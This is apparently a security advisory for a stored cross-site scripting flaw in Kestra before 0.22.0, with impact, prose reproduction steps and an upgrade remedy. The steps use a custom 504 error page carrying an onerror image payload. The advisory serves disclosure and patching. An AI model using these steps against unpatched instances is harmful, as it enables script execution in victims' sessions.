Kestra Stored Cross-Site Scripting Vulnerability

A stored cross-site scripting vulnerability has been identified in Kestra versions prior to 0.22.0. This issue arises in the execution 'Overview' tab, where an error message is improperly handling HTTP responses, allowing for the injection and execution of JavaScript payloads.

Impact

Exploitation of this vulnerability allows for the execution of injected JavaScript in the context of the Kestra application, potentially compromising the instance.

Reproduction

To reproduce this vulnerability, first set up a web server that returns a response containing a JavaScript payload, such as an image tag with an 'onerror' event. Configure the server to return a 504 error and serve a custom error page with the injected JavaScript. Next, create a workflow in Kestra that makes an HTTP request to the server endpoint returning the error. Once the workflow execution finishes with an error, navigate to the 'Overview' page of the execution, where the injected JavaScript will be executed.

Remediation

Users should upgrade to Kestra version 0.22.0 or later.